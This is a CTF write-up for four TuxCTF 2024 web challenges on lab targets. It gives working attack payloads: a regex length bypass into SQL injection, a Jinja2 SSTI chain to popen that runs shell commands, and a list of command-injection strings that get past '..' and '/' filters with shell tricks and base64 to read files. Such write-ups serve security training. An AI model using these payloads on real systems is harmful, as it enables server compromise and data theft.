# tuxCTFV1
### TuxCTF 2024 web Writeups
Hello, This is the Intended solutions for TuxCTF 2024 web Challenges
### Level1 Sanity Check
you just have to view the page source
The Flag:
```
tuxCTF{a1wAyS_ch3Ck_C0Mm3ntS}
```
***
### Level2 can you login?
We enter the link and find a login page
And we have the source code , whats intresting is the login.php file
We find a waf function, how does preg\_match works it searches for anything but litters and numbers, so anything else will be blocked!
but preg\_match is vulnerable, we can bypass it by giving it a long input, then it will not sanatize all of it and we can do sql injection!
to bypass the function we can do:
```bash
python3 -c 'print("A" * 9000)'
```
we copy the output and put in the last of it ‘or true– ‘
and we have the flag!!!
The Flag:
```
tuxCTF{$4n1T!ze_y0Ur_qu3rIeS}
```
***
### Level 3 Templates
We go to the link , the page is empty, we notice the query parameter “template”.
In the source code we discover it’s a web app with flask.
a waf that blocks some words.
A quick google search and we know that flask is vulnerable to ssti!!!
to test it we will use the payload
and success it returned 49 which means it calculated it.
[SSTI payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2)
we try this payload `dict.__base__.__subclasses__()`
we get a list of python classes, what we are intrested in is popen , if we can access it we can do anything on the server!!!
we have two ways to determine the popen class number: 1) write a python script which i will not do 2) fuzzing until we get it
on my local machine i got this `dict.__base__.__subclasses__()[291]`
The Full Payload:
```python
dict.__base__.__subclasses__()[291]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()
```
The Flag:
```
tuxCTF{1s_1t_5$ti_0r_5$rf}
```
***
### Level4 dots
for this challenge you also have the source code.
it’s also a flask web app, but you can only access /run\_command and only send post requests to it.
open burpsuite and intercept the request.
right click in the request to change the method to POST.
if you try to send the request with anything this will be the response:
if we look back at the source code we will know that it takes the body parameters in json format.
```python
data = request.get_json()
```
then it will look for the key “command” and sanitize the data.
```python
if 'command' in data:
command = str(data['command'])
# Length check
if len(command) < 5:
return jsonify({'message': 'Command too short'}), 501
# Perform security checks
if '..' in command or '/' in command:
return jsonify({'message': 'Hacking attempt detected'}), 501
```
to be able to send json data we need to change the header content type to application/json.
then add `{"command" : "hi"}` to the body of the request.
now if we send it we will get this response:
which means our payload is working.
now let’s understand how does the app work:
```python
# Find path to executable
executable_to_run = command.split()[0]
# Check if we can execute the binary
if os.access(executable_to_run, os.X_OK):
# Execute binary if it exists and is executable
out = os.popen(command).read()
return jsonify({'message': 'Command output: ' + str(out)}), 200
return jsonify({'message': 'Not implemented'}), 501
if __name__ == '__main__':
# Make sure we can only execute binaries in the executables directory
os.chdir('./executables/')
# Run server
app.run(host='0.0.0.0', port=7000)
```
here we can see that it will take the payload we send it, in the payload {“command” : “hi”} it will take it “hi” and then checks if it’s an executable in a directory named executables. we know this directory is empty from the docker file.
since the app is running on a Linux machine we know that the if the file is executable it will have the “x” permission.
if we try to do the command `ls -la` in a local Linux machine this the output:
we notice that . and .. are executable, .. is blacklisted but . is not!
if send `{"command" : "."}` we will get command to short, but if we send it with spaces `{"command" : ". "}`
it works !!!
the output is empty because the command . doesnt give anything back, but we know in Linux we can do multiple commands in one line using pipe `|` or a semicolon, let’s try that.
`{"command" : ". | pwd"}`
it works!!!
if we try `{"command" : ". | ls .."}` or `{"command" : ". | ls /"}` it will respond with:
to bypass this we can do alot of things, i choose to do `{"command" : ". | ls .''."}`
we can see that flag.txt is in the before directory, to bypass the slash restriction we can use `${HOME:0:1}`
`{"command" : ". | cat .''.${HOME:0:1}flag.txt"}`
to understand the payload, if we run echo `.''.` in any linux terminal the output will be `..`. and `${HOME:0:1}`, ${} we tell the shell to give us the output of some operation, here we tell it to take the home path variable , which is in every linux system, then it will slice it, for example the home directory absolute path is `/home/kali` it will take the first character which is `/`, so what will be executed in the machine terminal is
you can find various bypassing techniques in hacktricks:
[Bypass Linux Restrictions Payloads](https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions)
pwned!!!
The Flag:
```
tuxCTF{d0t$_4r3_3XeCut@b13}
```
here is a list of all intended payloads to solve this challenge:
{% code fullWidth="false" %}
```json
{ "command" : ". | ((echo Li4vZmxhZy50eHQ= | base64 -d) | xargs cat)" }
{ "command" : ". | ((echo L3Vzci9zcmMvYXBwL2ZsYWcudHh0 | base64 -d) | xargs cat)"}
{ "command" : ". <(echo true) && cd $(dirname $PWD) && cat flag.txt" }
{ "command" : ". <(echo true) ; cd $(dirname $PWD) ; cat flag.txt" }
{ "command" : ". | cat ${HOME:0:1}usr${HOME:0:1}src${HOME:0:1}app${HOME:0:1}flag.txt" }
{ "command" : ". ; python -c 'import os;x=os.path.normpath(os.getcwd() + os.sep + os.pardir);os.chdir(x);os.system(\"cat flag.txt\")'"}
{ "command" : ". $ or | or ; cat .''.${HOME:0:1}flag.txt 2>&1"}
{ "command" : ". <(echo true) && cat .''.${HOME:0:1}flag.txt " }
```
{% endcode %}
happy pwning :)
